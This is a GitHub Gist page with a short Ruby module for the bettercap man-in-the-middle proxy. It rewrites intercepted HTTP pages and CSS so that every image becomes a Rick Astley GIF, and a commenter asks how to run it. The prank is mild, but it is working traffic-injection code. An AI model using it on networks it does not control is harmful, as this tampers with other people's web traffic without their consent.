Last active
May 8, 2019 17:47
-
-
Save nstarke/b00f1b8c272c8a8c36be to your computer and use it in GitHub Desktop.
A bettercap module that replaces all images in a HTTP response with a rick astley gif
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
class RickAstley < BetterCap::Proxy::Module | |
def on_request( request, response ) | |
if response.content_type =~ /^text\/html.*/ | |
BetterCap::Logger.info "Rick Rolling http://#{request.host}#{request.url}" | |
# replace img tags | |
response.body.gsub!( /\<img.*\>/, '<img src="http://i.giphy.com/Vuw9m5wXviFIQ.gif">' ) | |
# replace CSS background-images | |
response.body.gsub!(/url\(.*\.(gif|jpg|jpeg|png).*\)/, 'url("http://i.giphy.com/Vuw9m5wXviFIQ.gif")') | |
elsif response.content_type =~ /^text\/css.*/ | |
# replace CSS background-images | |
response.body.gsub!(/url\(.*\.(gif|jpg|jpeg|png).*\)/, 'url("http://i.giphy.com/Vuw9m5wXviFIQ.gif")') | |
end | |
end | |
end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
how do i run this bro?